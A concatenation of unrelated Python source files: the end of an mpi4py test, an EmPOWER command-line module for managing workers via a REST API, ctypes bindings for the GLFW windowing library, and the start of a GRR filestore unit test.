self.COMM = MPI.COMM_SELF.Dup()
def tearDown(self):
self.COMM.Free()
class TestCCOObjWorldDup(TestCCOObjWorld):
def setUp(self):
self.COMM = MPI.COMM_WORLD.Dup()
def tearDown(self):
self.COMM.Free()
name, version = MPI.get_vendor()
if name == 'Open MPI':
if version < (1,4,0):
if MPI.Query_thread() > MPI.THREAD_SINGLE:
del TestCCOObjWorldDup
if __name__ == '__main__':
unittest.main()
|
|
#!/usr/bin/env python3
#
# Copyright (c) 2019 Roberto Riggio
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Workers CLI tools."""
import uuid
import argparse
import empower.cli.command as command
def do_list_workers(gargs, args, leftovers):
"""List currently running workers. """
_, data = command.connect(gargs, ('GET', '/api/v1/workers'), 200)
for entry in data.values():
accum = []
accum.append("worker_id ")
accum.append(entry['service_id'])
accum.append(" name ")
accum.append(entry['name'])
print(''.join(accum))
def do_list_workers_catalog(gargs, args, leftovers):
"""List workers that can be loaded. """
_, data = command.connect(gargs, ('GET', '/api/v1/catalog'), 200)
for entry in data.values():
accum = []
accum.append("name ")
accum.append(entry['name'])
accum.append("\n")
accum.append(" desc: ")
accum.append(entry['desc'])
accum.append("\n params:")
for k, val in entry['params'].items():
if k in ('service_id', 'project_id'):
continue
accum.append("\n %s: %s" % (k, val['desc']))
if 'default' in val:
accum.append(" Default: %s." % val['default'])
accum.append(" Type: %s." % val['type'])
accum.append(" Mandatory: %s." % val['mandatory'])
print(''.join(accum))
def pa_load_worker(args, cmd):
"""Load application parser method. """
usage = "%s <options>" % command.USAGE.format(cmd)
desc = command.DESCS[cmd]
parser = argparse.ArgumentParser(usage=usage, description=desc)
required = parser.add_argument_group('required named arguments')
    required.add_argument('-n', '--name', help='The worker name',
required=True, type=str, dest="name")
(args, leftovers) = parser.parse_known_args(args)
return args, leftovers
def do_load_worker(gargs, args, leftovers):
"""Load and application. """
request = {
"version": "1.0",
"name": args.name,
"params": command.get_params(leftovers)
}
headers = command.get_headers(gargs)
url = '/api/v1/workers'
response, _ = command.connect(gargs, ('POST', url), 201, request,
headers=headers)
location = response.headers['Location']
tokens = location.split("/")
worker_id = tokens[-1]
url = '/api/v1/workers/%s' % worker_id
_, data = command.connect(gargs, ('GET', url), 200, headers=headers)
print(data['service_id'])
def pa_unload_worker(args, cmd):
"""Unload application parser method. """
usage = "%s <options>" % command.USAGE.format(cmd)
desc = command.DESCS[cmd]
parser = argparse.ArgumentParser(usage=usage, description=desc)
required = parser.add_argument_group('required named arguments')
required.add_argument('-a', '--worker_id', help='The worker id',
required=True, type=uuid.UUID, dest="worker_id")
(args, leftovers) = parser.parse_known_args(args)
return args, leftovers
def do_unload_worker(gargs, args, _):
"""Unload and application. """
url = '/api/v1/workers/%s' % args.worker_id
command.connect(gargs, ('DELETE', url), 204)
print(args.worker_id)
def do_unload_all_workers(gargs, args, leftovers):
"""Unload and application. """
headers = command.get_headers(gargs)
url = '/api/v1/workers'
_, data = command.connect(gargs, ('GET', url), 200, headers=headers)
for entry in data.values():
worker_id = entry['service_id']
url = '/api/v1/workers/%s' % worker_id
command.connect(gargs, ('DELETE', url), 204, headers=headers)
print(worker_id)
def pa_set_worker_params(args, cmd):
"""Set worker param parser method. """
usage = "%s <options>" % command.USAGE.format(cmd)
desc = command.DESCS[cmd]
parser = argparse.ArgumentParser(usage=usage, description=desc)
required = parser.add_argument_group('required named arguments')
required.add_argument('-a', '--worker_id', help='The worker id',
required=True, type=uuid.UUID, dest="worker_id")
(args, leftovers) = parser.parse_known_args(args)
return args, leftovers
def do_set_worker_params(gargs, args, leftovers):
"""Set worker parameters. """
request = {
"version": "1.0",
"params": command.get_params(leftovers)
}
print(request)
headers = command.get_headers(gargs)
url = '/api/v1/workers/%s' % args.worker_id
command.connect(gargs, ('PUT', url), 204, request, headers=headers)
url = '/api/v1/workers/%s' % args.worker_id
_, data = command.connect(gargs, ('GET', url), 200, headers=headers)
accum = []
accum.append("worker_id ")
accum.append(data['service_id'])
accum.append("\n name ")
accum.append(data['name'])
accum.append("\n params:")
for k, val in data['params'].items():
accum.append("\n %s: %s" % (k, val))
print(''.join(accum))
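# Hypothetical wiring sketch (assumption, not part of this module): how a CLI
# dispatcher might pair each pa_* argument parser with its do_* handler. The
# command names and the use of None for "no extra parser" are illustrative only.
WORKER_CMDS = {
    'list-workers': (None, do_list_workers),
    'list-workers-catalog': (None, do_list_workers_catalog),
    'load-worker': (pa_load_worker, do_load_worker),
    'unload-worker': (pa_unload_worker, do_unload_worker),
    'unload-all-workers': (None, do_unload_all_workers),
    'set-worker-params': (pa_set_worker_params, do_set_worker_params),
}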
|
|
# -----------------------------------------------------------------------------
# GLFW - An OpenGL framework
# API version: 3.0.1
# WWW: http://www.glfw.org/
# ----------------------------------------------------------------------------
# Copyright (c) 2002-2006 Marcus Geelnard
# Copyright (c) 2006-2010 Camilla Berglund
#
# Python bindings - Copyright (c) 2013 Nicolas P. Rougier
#
# This software is provided 'as-is', without any express or implied
# warranty. In no event will the authors be held liable for any damages
# arising from the use of this software.
#
# Permission is granted to anyone to use this software for any purpose,
# including commercial applications, and to alter it and redistribute it
# freely, subject to the following restrictions:
#
# 1. The origin of this software must not be misrepresented; you must not
# claim that you wrote the original software. If you use this software
# in a product, an acknowledgment in the product documentation would
# be appreciated but is not required.
#
# 2. Altered source versions must be plainly marked as such, and must not
# be misrepresented as being the original software.
#
# 3. This notice may not be removed or altered from any source
# distribution.
#
# ----------------
# changes by moritz kassner:
# small bugfixes, changed binary loading routine.
# Upgrade to 3.1.x api.
# -----------------------------------------------------------------------------
import sys,os
import ctypes
from ctypes import c_int, c_ushort, c_char_p, c_double, c_uint, c_ubyte, c_float, c_char, Structure, CFUNCTYPE, byref, POINTER
import platform
from ctypes.util import find_library
os_name = platform.system()
del platform
if getattr(sys, 'frozen', False):
# we are running in a |PyInstaller| bundle using a local version
# you will need to add glfw.so/dylib in your spec file.
if os_name == "Linux":
filename = 'libglfw.so'
elif os_name == "Darwin":
filename = 'libglfw3.dylib'
elif os_name == "Windows":
filename = 'glfw3.dll'
else:
filename = 'libglfw.dll'
dll_path = os.path.join(sys._MEIPASS,filename)
else:
# we are running in a normal Python environment
if os_name == "Linux":
dll_path = find_library('glfw')
elif os_name == "Darwin":
dll_path = find_library('glfw3')
elif os_name == "Windows":
dll_path = os.path.join(os.path.dirname(os.path.abspath(os.path.curdir)), 'shared_modules', 'external', 'glfw3')
else:
dll_path = find_library('glfw')
if not dll_path:
    raise RuntimeError('GLFW library not found')
_glfw = ctypes.CDLL(dll_path)
# --- Version -----------------------------------------------------------------
GLFW_VERSION_MAJOR = 3
GLFW_VERSION_MINOR = 1
GLFW_VERSION_REVISION = 1
__version__ = GLFW_VERSION_MAJOR, GLFW_VERSION_MINOR, GLFW_VERSION_REVISION
# --- Input handling definitions ----------------------------------------------
GLFW_RELEASE = 0
GLFW_PRESS = 1
GLFW_REPEAT = 2
# --- Keys --------------------------------------------------------------------
# --- The unknown key ---------------------------------------------------------
GLFW_KEY_UNKNOWN = -1
# --- Printable keys ----------------------------------------------------------
GLFW_KEY_SPACE = 32
GLFW_KEY_APOSTROPHE = 39 # '
GLFW_KEY_COMMA = 44 # ,
GLFW_KEY_MINUS = 45 # -
GLFW_KEY_PERIOD = 46 # .
GLFW_KEY_SLASH = 47 # /
GLFW_KEY_0 = 48
GLFW_KEY_1 = 49
GLFW_KEY_2 = 50
GLFW_KEY_3 = 51
GLFW_KEY_4 = 52
GLFW_KEY_5 = 53
GLFW_KEY_6 = 54
GLFW_KEY_7 = 55
GLFW_KEY_8 = 56
GLFW_KEY_9 = 57
GLFW_KEY_SEMICOLON = 59 # ;
GLFW_KEY_EQUAL = 61 # =
GLFW_KEY_A = 65
GLFW_KEY_B = 66
GLFW_KEY_C = 67
GLFW_KEY_D = 68
GLFW_KEY_E = 69
GLFW_KEY_F = 70
GLFW_KEY_G = 71
GLFW_KEY_H = 72
GLFW_KEY_I = 73
GLFW_KEY_J = 74
GLFW_KEY_K = 75
GLFW_KEY_L = 76
GLFW_KEY_M = 77
GLFW_KEY_N = 78
GLFW_KEY_O = 79
GLFW_KEY_P = 80
GLFW_KEY_Q = 81
GLFW_KEY_R = 82
GLFW_KEY_S = 83
GLFW_KEY_T = 84
GLFW_KEY_U = 85
GLFW_KEY_V = 86
GLFW_KEY_W = 87
GLFW_KEY_X = 88
GLFW_KEY_Y = 89
GLFW_KEY_Z = 90
GLFW_KEY_LEFT_BRACKET = 91 # [
GLFW_KEY_BACKSLASH = 92 # \
GLFW_KEY_RIGHT_BRACKET = 93 # ]
GLFW_KEY_GRAVE_ACCENT = 96 # `
GLFW_KEY_WORLD_1 = 161 # non-US #1
GLFW_KEY_WORLD_2 = 162 # non-US #2
# --- Function keys -----------------------------------------------------------
GLFW_KEY_ESCAPE = 256
GLFW_KEY_ENTER = 257
GLFW_KEY_TAB = 258
GLFW_KEY_BACKSPACE = 259
GLFW_KEY_INSERT = 260
GLFW_KEY_DELETE = 261
GLFW_KEY_RIGHT = 262
GLFW_KEY_LEFT = 263
GLFW_KEY_DOWN = 264
GLFW_KEY_UP = 265
GLFW_KEY_PAGE_UP = 266
GLFW_KEY_PAGE_DOWN = 267
GLFW_KEY_HOME = 268
GLFW_KEY_END = 269
GLFW_KEY_CAPS_LOCK = 280
GLFW_KEY_SCROLL_LOCK = 281
GLFW_KEY_NUM_LOCK = 282
GLFW_KEY_PRINT_SCREEN = 283
GLFW_KEY_PAUSE = 284
GLFW_KEY_F1 = 290
GLFW_KEY_F2 = 291
GLFW_KEY_F3 = 292
GLFW_KEY_F4 = 293
GLFW_KEY_F5 = 294
GLFW_KEY_F6 = 295
GLFW_KEY_F7 = 296
GLFW_KEY_F8 = 297
GLFW_KEY_F9 = 298
GLFW_KEY_F10 = 299
GLFW_KEY_F11 = 300
GLFW_KEY_F12 = 301
GLFW_KEY_F13 = 302
GLFW_KEY_F14 = 303
GLFW_KEY_F15 = 304
GLFW_KEY_F16 = 305
GLFW_KEY_F17 = 306
GLFW_KEY_F18 = 307
GLFW_KEY_F19 = 308
GLFW_KEY_F20 = 309
GLFW_KEY_F21 = 310
GLFW_KEY_F22 = 311
GLFW_KEY_F23 = 312
GLFW_KEY_F24 = 313
GLFW_KEY_F25 = 314
GLFW_KEY_KP_0 = 320
GLFW_KEY_KP_1 = 321
GLFW_KEY_KP_2 = 322
GLFW_KEY_KP_3 = 323
GLFW_KEY_KP_4 = 324
GLFW_KEY_KP_5 = 325
GLFW_KEY_KP_6 = 326
GLFW_KEY_KP_7 = 327
GLFW_KEY_KP_8 = 328
GLFW_KEY_KP_9 = 329
GLFW_KEY_KP_DECIMAL = 330
GLFW_KEY_KP_DIVIDE = 331
GLFW_KEY_KP_MULTIPLY = 332
GLFW_KEY_KP_SUBTRACT = 333
GLFW_KEY_KP_ADD = 334
GLFW_KEY_KP_ENTER = 335
GLFW_KEY_KP_EQUAL = 336
GLFW_KEY_LEFT_SHIFT = 340
GLFW_KEY_LEFT_CONTROL = 341
GLFW_KEY_LEFT_ALT = 342
GLFW_KEY_LEFT_SUPER = 343
GLFW_KEY_RIGHT_SHIFT = 344
GLFW_KEY_RIGHT_CONTROL = 345
GLFW_KEY_RIGHT_ALT = 346
GLFW_KEY_RIGHT_SUPER = 347
GLFW_KEY_MENU = 348
GLFW_KEY_LAST = GLFW_KEY_MENU
# --- Modifiers ---------------------------------------------------------------
GLFW_MOD_SHIFT = 0x0001
GLFW_MOD_CONTROL = 0x0002
GLFW_MOD_ALT = 0x0004
GLFW_MOD_SUPER = 0x0008
# --- Mouse -------------------------------------------------------------------
GLFW_MOUSE_BUTTON_1 = 0
GLFW_MOUSE_BUTTON_2 = 1
GLFW_MOUSE_BUTTON_3 = 2
GLFW_MOUSE_BUTTON_4 = 3
GLFW_MOUSE_BUTTON_5 = 4
GLFW_MOUSE_BUTTON_6 = 5
GLFW_MOUSE_BUTTON_7 = 6
GLFW_MOUSE_BUTTON_8 = 7
GLFW_MOUSE_BUTTON_LAST = GLFW_MOUSE_BUTTON_8
GLFW_MOUSE_BUTTON_LEFT = GLFW_MOUSE_BUTTON_1
GLFW_MOUSE_BUTTON_RIGHT = GLFW_MOUSE_BUTTON_2
GLFW_MOUSE_BUTTON_MIDDLE = GLFW_MOUSE_BUTTON_3
# --- Joystick ----------------------------------------------------------------
GLFW_JOYSTICK_1 = 0
GLFW_JOYSTICK_2 = 1
GLFW_JOYSTICK_3 = 2
GLFW_JOYSTICK_4 = 3
GLFW_JOYSTICK_5 = 4
GLFW_JOYSTICK_6 = 5
GLFW_JOYSTICK_7 = 6
GLFW_JOYSTICK_8 = 7
GLFW_JOYSTICK_9 = 8
GLFW_JOYSTICK_10 = 9
GLFW_JOYSTICK_11 = 10
GLFW_JOYSTICK_12 = 11
GLFW_JOYSTICK_13 = 12
GLFW_JOYSTICK_14 = 13
GLFW_JOYSTICK_15 = 14
GLFW_JOYSTICK_16 = 15
GLFW_JOYSTICK_LAST = GLFW_JOYSTICK_16
# --- Error codes -------------------------------------------------------------
GLFW_NOT_INITIALIZED = 0x00010001
GLFW_NO_CURRENT_CONTEXT = 0x00010002
GLFW_INVALID_ENUM = 0x00010003
GLFW_INVALID_VALUE = 0x00010004
GLFW_OUT_OF_MEMORY = 0x00010005
GLFW_API_UNAVAILABLE = 0x00010006
GLFW_VERSION_UNAVAILABLE = 0x00010007
GLFW_PLATFORM_ERROR = 0x00010008
GLFW_FORMAT_UNAVAILABLE = 0x00010009
# ---
GLFW_FOCUSED = 0x00020001
GLFW_ICONIFIED = 0x00020002
GLFW_RESIZABLE = 0x00020003
GLFW_VISIBLE = 0x00020004
GLFW_DECORATED = 0x00020005
# ---
GLFW_RED_BITS = 0x00021001
GLFW_GREEN_BITS = 0x00021002
GLFW_BLUE_BITS = 0x00021003
GLFW_ALPHA_BITS = 0x00021004
GLFW_DEPTH_BITS = 0x00021005
GLFW_STENCIL_BITS = 0x00021006
GLFW_ACCUM_RED_BITS = 0x00021007
GLFW_ACCUM_GREEN_BITS = 0x00021008
GLFW_ACCUM_BLUE_BITS = 0x00021009
GLFW_ACCUM_ALPHA_BITS = 0x0002100A
GLFW_AUX_BUFFERS = 0x0002100B
GLFW_STEREO = 0x0002100C
GLFW_SAMPLES = 0x0002100D
GLFW_SRGB_CAPABLE = 0x0002100E
GLFW_REFRESH_RATE = 0x0002100F
# ---
GLFW_CLIENT_API = 0x00022001
GLFW_CONTEXT_VERSION_MAJOR = 0x00022002
GLFW_CONTEXT_VERSION_MINOR = 0x00022003
GLFW_CONTEXT_REVISION = 0x00022004
GLFW_CONTEXT_ROBUSTNESS = 0x00022005
GLFW_OPENGL_FORWARD_COMPAT = 0x00022006
GLFW_OPENGL_DEBUG_CONTEXT = 0x00022007
GLFW_OPENGL_PROFILE = 0x00022008
# ---
GLFW_OPENGL_API = 0x00030001
GLFW_OPENGL_ES_API = 0x00030002
# ---
GLFW_NO_ROBUSTNESS = 0
GLFW_NO_RESET_NOTIFICATION = 0x00031001
GLFW_LOSE_CONTEXT_ON_RESET = 0x00031002
# ---
GLFW_OPENGL_ANY_PROFILE = 0
GLFW_OPENGL_CORE_PROFILE = 0x00032001
GLFW_OPENGL_COMPAT_PROFILE = 0x00032002
# ---
GLFW_CURSOR = 0x00033001
GLFW_STICKY_KEYS = 0x00033002
GLFW_STICKY_MOUSE_BUTTONS = 0x00033003
# ---
GLFW_CURSOR_NORMAL = 0x00034001
GLFW_CURSOR_HIDDEN = 0x00034002
GLFW_CURSOR_DISABLED = 0x00034003
# ---
GLFW_CONNECTED = 0x00040001
GLFW_DISCONNECTED = 0x00040002
# --- Structures --------------------------------------------------------------
class GLFWvidmode(Structure):
_fields_ = [ ('width', c_int),
('height', c_int),
('redBits', c_int),
('greenBits', c_int),
('blueBits', c_int),
('refreshRate', c_int) ]
class GLFWgammaramp(Structure):
_fields_ = [ ('red', POINTER(c_ushort)),
('green', POINTER(c_ushort)),
('blue', POINTER(c_ushort)),
('size', c_int) ]
class GLFWwindow(Structure): pass
class GLFWmonitor(Structure): pass
# --- Callbacks ---------------------------------------------------------------
errorfun = CFUNCTYPE(None, c_int, c_char_p)
windowposfun = CFUNCTYPE(None, POINTER(GLFWwindow), c_int, c_int)
windowsizefun = CFUNCTYPE(None, POINTER(GLFWwindow), c_int, c_int)
windowclosefun = CFUNCTYPE(None, POINTER(GLFWwindow))
windowrefreshfun = CFUNCTYPE(None, POINTER(GLFWwindow))
windowfocusfun = CFUNCTYPE(None, POINTER(GLFWwindow), c_int)
windowiconifyfun = CFUNCTYPE(None, POINTER(GLFWwindow), c_int)
framebuffersizefun = CFUNCTYPE(None, POINTER(GLFWwindow), c_int, c_int)
mousebuttonfun = CFUNCTYPE(None, POINTER(GLFWwindow), c_int, c_int, c_int)
cursorposfun = CFUNCTYPE(None, POINTER(GLFWwindow), c_double, c_double)
cursorenterfun = CFUNCTYPE(None, POINTER(GLFWwindow), c_int)
scrollfun = CFUNCTYPE(None, POINTER(GLFWwindow), c_double, c_double)
keyfun = CFUNCTYPE(None, POINTER(GLFWwindow), c_int, c_int, c_int, c_int)
charfun = CFUNCTYPE(None, POINTER(GLFWwindow), c_uint)
monitorfun = CFUNCTYPE(None, POINTER(GLFWmonitor), c_int)
dropfun = CFUNCTYPE(None, POINTER(GLFWwindow), c_int, POINTER(c_char_p))
# --- Init --------------------------------------------------------------------
# glfwInit = _glfw.glfwInit
glfwTerminate = _glfw.glfwTerminate
#glfwGetVersion = _glfw.glfwGetVersion
glfwGetVersionString = _glfw.glfwGetVersionString
glfwGetVersionString.restype = c_char_p
# --- Error -------------------------------------------------------------------
#glfwSetErrorCallback = _glfw.glfwSetErrorCallback
# --- Monitor -----------------------------------------------------------------
# glfwGetMonitors = _glfw.glfwGetMonitors
# glfwGetMonitors.restype = POINTER(GLFWmonitor)
glfwGetPrimaryMonitor = _glfw.glfwGetPrimaryMonitor
glfwGetPrimaryMonitor.restype = POINTER(GLFWmonitor)
# glfwGetMonitorPos = _glfw.glfwGetMonitorPos
# glfwGetMonitorPhysicalSize = _glfw.glfwGetMonitorPhysicalSize
glfwGetMonitorName = _glfw.glfwGetMonitorName
glfwGetMonitorName.restype = c_char_p
# glfwSetMonitorCallback = _glfw.glfwSetMonitorCallback
# glfwGetVideoModes = _glfw.glfwGetVideoModes
# glfwGetVideoMode = _glfw.glfwGetVideoMode
# --- Gamma -------------------------------------------------------------------
glfwSetGamma = _glfw.glfwSetGamma
# glfwGetGammaRamp = _glfw.glfwGetGammaRamp
# glfwSetGammaRamp = _glfw.glfwSetGammaRamp
# --- Window ------------------------------------------------------------------
glfwDefaultWindowHints = _glfw.glfwDefaultWindowHints
glfwWindowHint = _glfw.glfwWindowHint
# glfwCreateWindow = _glfw.glfwCreateWindow
# glfwDestroyWindow = _glfw.glfwDestroyWindow
glfwWindowShouldClose = _glfw.glfwWindowShouldClose
glfwSetWindowShouldClose = _glfw.glfwSetWindowShouldClose
glfwSetWindowTitle = _glfw.glfwSetWindowTitle
# glfwGetWindowPos = _glfw.glfwGetWindowPos
glfwSetWindowPos = _glfw.glfwSetWindowPos
# glfwGetWindowSize = _glfw.glfwGetWindowSize
glfwSetWindowSize = _glfw.glfwSetWindowSize
# glfwGetFramebufferSize = _glfw.glfwGetFramebufferSize
glfwIconifyWindow = _glfw.glfwIconifyWindow
glfwRestoreWindow = _glfw.glfwRestoreWindow
glfwShowWindow = _glfw.glfwShowWindow
glfwHideWindow = _glfw.glfwHideWindow
glfwGetWindowMonitor = _glfw.glfwGetWindowMonitor
glfwGetWindowAttrib = _glfw.glfwGetWindowAttrib
glfwSetWindowUserPointer = _glfw.glfwSetWindowUserPointer
glfwGetWindowUserPointer = _glfw.glfwGetWindowUserPointer
# glfwSetWindowPosCallback = _glfw.glfwSetWindowPosCallback
# glfwSetWindowSizeCallback = _glfw.glfwSetWindowSizeCallback
# glfwSetWindowCloseCallback = _glfw.glfwSetWindowCloseCallback
# glfwSetWindowRefreshCallback = _glfw.glfwSetWindowRefreshCallback
# glfwSetWindowFocusCallback = _glfw.glfwSetWindowFocusCallback
# glfwSetWindowIconifyCallback = _glfw.glfwSetWindowIconifyCallback
# glfwSetFramebufferSizeCallback = _glfw.glfwSetFramebufferSizeCallback
glfwPollEvents = _glfw.glfwPollEvents
glfwWaitEvents = _glfw.glfwWaitEvents
# --- Input -------------------------------------------------------------------
glfwGetInputMode = _glfw.glfwGetInputMode
glfwSetInputMode = _glfw.glfwSetInputMode
glfwGetKey = _glfw.glfwGetKey
glfwGetMouseButton = _glfw.glfwGetMouseButton
# glfwGetCursorPos = _glfw.glfwGetCursorPos
glfwSetCursorPos = _glfw.glfwSetCursorPos
# glfwSetKeyCallback = _glfw.glfwSetKeyCallback
# glfwSetCharCallback = _glfw.glfwSetCharCallback
# glfwSetMouseButtonCallback = _glfw.glfwSetMouseButtonCallback
# glfwSetCursorPosCallback = _glfw.glfwSetCursorPosCallback
# glfwSetCursorEnterCallback = _glfw.glfwSetCursorEnterCallback
# glfwSetScrollCallback = _glfw.glfwSetScrollCallback
glfwJoystickPresent = _glfw.glfwJoystickPresent
# glfwGetJoystickAxes = _glfw.glfwGetJoystickAxes
# glfwGetJoystickButtons = _glfw.glfwGetJoystickButtons
glfwGetJoystickName = _glfw.glfwGetJoystickName
glfwGetJoystickName.restype = c_char_p
# --- Clipboard ---------------------------------------------------------------
glfwSetClipboardString = _glfw.glfwSetClipboardString
glfwGetClipboardString = _glfw.glfwGetClipboardString
glfwGetClipboardString.restype = c_char_p
# --- Timer -------------------------------------------------------------------
glfwGetTime = _glfw.glfwGetTime
glfwGetTime.restype = c_double
glfwSetTime = _glfw.glfwSetTime
# --- Context -----------------------------------------------------------------
glfwMakeContextCurrent = _glfw.glfwMakeContextCurrent
# glfwGetCurrentContext = _glfw.glfwGetCurrentContext
glfwSwapBuffers = _glfw.glfwSwapBuffers
glfwSwapInterval = _glfw.glfwSwapInterval
glfwExtensionSupported = _glfw.glfwExtensionSupported
glfwGetProcAddress = _glfw.glfwGetProcAddress
# --- Pythonizer --------------------------------------------------------------
# This keeps track of current windows
__windows__ = []
# This is to prevent garbage collection on callbacks
__c_callbacks__ = {}
__py_callbacks__ = {}
def glfwInit():
import os
    # glfw changes the working directory, so we change it back.
cwd = os.getcwd()
# Initialize
_glfw.glfwInit()
# Restore the old cwd.
os.chdir(cwd)
del os
def glfwCreateWindow(width=640, height=480, title="GLFW Window", monitor=None, share=None):
_glfw.glfwCreateWindow.restype = POINTER(GLFWwindow)
window = _glfw.glfwCreateWindow(width,height,title,monitor,share)
__windows__.append(window)
index = __windows__.index(window)
__c_callbacks__[index] = {}
__py_callbacks__[index] = { 'errorfun' : None,
'monitorfun' : None,
'windowposfun' : None,
'windowsizefun' : None,
'windowclosefun' : None,
'windowrefreshfun' : None,
'windowfocusfun' : None,
'windowiconifyfun' : None,
'framebuffersizefun' : None,
'keyfun' : None,
'charfun' : None,
'mousebuttonfun' : None,
'cursorposfun' : None,
'cursorenterfun' : None,
'scrollfun' : None,
'dropfun' : None,}
return window
def glfwDestroyWindow(window):
index = __windows__.index(window)
    # glfw 3.1 appears to require the context being destroyed to be the current one.
current = glfwGetCurrentContext()
glfwMakeContextCurrent(window)
_glfw.glfwDestroyWindow(window)
glfwMakeContextCurrent(current)
# We do not delete window from the list (or it would impact windows numbering)
# del __windows__[index]
del __c_callbacks__[index]
del __py_callbacks__[index]
def glfwGetVersion():
major, minor, rev = c_int(0), c_int(0), c_int(0)
_glfw.glfwGetVersion( byref(major), byref(minor), byref(rev) )
return major.value, minor.value, rev.value
def glfwGetWindowPos(window):
xpos, ypos = c_int(0), c_int(0)
_glfw.glfwGetWindowPos(window, byref(xpos), byref(ypos))
return xpos.value, ypos.value
def glfwGetCursorPos(window):
xpos, ypos = c_double(0), c_double(0)
_glfw.glfwGetCursorPos(window, byref(xpos), byref(ypos))
return xpos.value, ypos.value
def glfwGetWindowSize(window):
width, height = c_int(0), c_int(0)
_glfw.glfwGetWindowSize(window, byref(width), byref(height))
return width.value, height.value
def glfwGetCurrentContext():
_glfw.glfwGetCurrentContext.restype = POINTER(GLFWwindow)
return _glfw.glfwGetCurrentContext()
def glfwGetFramebufferSize(window):
width, height = c_int(0), c_int(0)
_glfw.glfwGetFramebufferSize(window, byref(width), byref(height))
return width.value, height.value
def glfwGetMonitors():
count = c_int(0)
_glfw.glfwGetMonitors.restype = POINTER(POINTER(GLFWmonitor))
c_monitors = _glfw.glfwGetMonitors( byref(count) )
return [c_monitors[i] for i in range(count.value)]
def glfwGetVideoModes(monitor):
count = c_int(0)
_glfw.glfwGetVideoModes.restype = POINTER(GLFWvidmode)
c_modes = _glfw.glfwGetVideoModes( monitor, byref(count) )
modes = []
for i in range(count.value):
modes.append( (c_modes[i].width,
c_modes[i].height,
c_modes[i].redBits,
c_modes[i].blueBits,
c_modes[i].greenBits,
c_modes[i].refreshRate ) )
return modes
def glfwGetMonitorPos(monitor):
xpos, ypos = c_int(0), c_int(0)
_glfw.glfwGetMonitorPos(monitor, byref(xpos), byref(ypos))
return xpos.value, ypos.value
def glfwGetMonitorPhysicalSize(monitor):
width, height = c_int(0), c_int(0)
_glfw.glfwGetMonitorPhysicalSize(monitor, byref(width), byref(height))
return width.value, height.value
def glfwGetVideoMode(monitor):
_glfw.glfwGetVideoMode.restype = POINTER(GLFWvidmode)
c_mode = _glfw.glfwGetVideoMode(monitor)
return (c_mode.contents.width,
c_mode.contents.height,
c_mode.contents.redBits,
c_mode.contents.blueBits,
c_mode.contents.greenBits,
c_mode.contents.refreshRate )
def GetGammaRamp(monitor):
_glfw.glfwGetGammaRamp.restype = POINTER(GLFWgammaramp)
c_gamma = _glfw.glfwGetGammaRamp(monitor).contents
gamma = {'red':[], 'green':[], 'blue':[]}
if c_gamma:
for i in range(c_gamma.size):
gamma['red'].append(c_gamma.red[i])
gamma['green'].append(c_gamma.green[i])
gamma['blue'].append(c_gamma.blue[i])
return gamma
def glfwGetJoystickAxes(joy):
    count = c_int(0)
    _glfw.glfwGetJoystickAxes.restype = POINTER(c_float)
    c_axes = _glfw.glfwGetJoystickAxes(joy, byref(count))
    # Indexing a POINTER(c_float) already yields Python floats.
    return [c_axes[i] for i in range(count.value)]
def glfwGetJoystickButtons(joy):
    count = c_int(0)
    # GLFW reports button states as an array of unsigned chars.
    _glfw.glfwGetJoystickButtons.restype = POINTER(c_ubyte)
    c_buttons = _glfw.glfwGetJoystickButtons(joy, byref(count))
    return [c_buttons[i] for i in range(count.value)]
# --- Callbacks ---------------------------------------------------------------
def __callback__(name):
callback = 'glfwSet%sCallback' % name
fun = '%sfun' % name.lower()
code = """
def %(callback)s(window, callback = None):
index = __windows__.index(window)
old_callback = __py_callbacks__[index]['%(fun)s']
__py_callbacks__[index]['%(fun)s'] = callback
if callback: callback = %(fun)s(callback)
__c_callbacks__[index]['%(fun)s'] = callback
_glfw.%(callback)s(window, callback)
return old_callback""" % {'callback': callback, 'fun': fun}
return code
exec __callback__('Error')
exec __callback__('Monitor')
exec __callback__('WindowPos')
exec __callback__('WindowSize')
exec __callback__('WindowClose')
exec __callback__('WindowRefresh')
exec __callback__('WindowFocus')
exec __callback__('WindowIconify')
exec __callback__('FramebufferSize')
exec __callback__('Key')
exec __callback__('Char')
exec __callback__('MouseButton')
exec __callback__('CursorPos')
exec __callback__('Scroll')
exec __callback__('Drop')
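# --- Usage sketch --------------------------------------------------------------
# Minimal, illustrative example (not part of the original bindings): open a
# window, close it with ESC via the generated glfwSetKeyCallback wrapper, and
# pump events until the window is flagged to close.
if __name__ == '__main__':
    glfwInit()
    window = glfwCreateWindow(640, 480, "glfw demo")
    glfwMakeContextCurrent(window)

    def on_key(win, key, scancode, action, mods):
        # Ask the window to close when ESC is pressed.
        if key == GLFW_KEY_ESCAPE and action == GLFW_PRESS:
            glfwSetWindowShouldClose(win, 1)

    glfwSetKeyCallback(window, on_key)
    while not glfwWindowShouldClose(window):
        glfwSwapBuffers(window)
        glfwPollEvents()
    glfwDestroyWindow(window)
    glfwTerminate()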
|
|
#!/usr/bin/env python
"""Tests for grr.lib.aff4_objects.filestore."""
import os
import StringIO
import time
from grr.lib import action_mocks
from grr.lib import aff4
from grr.lib import config_lib
from grr.lib import flow
from grr.lib import rdfvalue
from grr.lib import test_lib
from grr.lib import utils
from grr.lib.aff4_objects import filestore
class FakeStore(object):
PRIORITY = 99
PATH = rdfvalue.RDFURN("aff4:/files/temp")
def __init__(self, path, token):
self.dest_file = aff4.FACTORY.Create(path, "AFF4MemoryStream",
mode="rw", token=token)
def AddFile(self, unused_blob_fd, sync=False):
_ = sync
return self.dest_file
def Get(self, _):
return True
class Schema(object):
ACTIVE = "unused"
class FileStoreTest(test_lib.AFF4ObjectTest):
"""Tests for file store functionality."""
def testFileAdd(self):
fs = aff4.FACTORY.Open(filestore.FileStore.PATH, "FileStore",
token=self.token)
fake_store1 = FakeStore("aff4:/files/temp1", self.token)
fake_store2 = FakeStore("aff4:/files/temp2", self.token)
with utils.Stubber(fs, "OpenChildren",
lambda: [fake_store1, fake_store2]):
src_fd = aff4.FACTORY.Create(aff4.ROOT_URN.Add("temp").Add("src"),
"VFSBlobImage", token=self.token, mode="rw")
src_fd.SetChunksize(filestore.FileStore.CHUNK_SIZE)
src_data = "ABC" * filestore.FileStore.CHUNK_SIZE
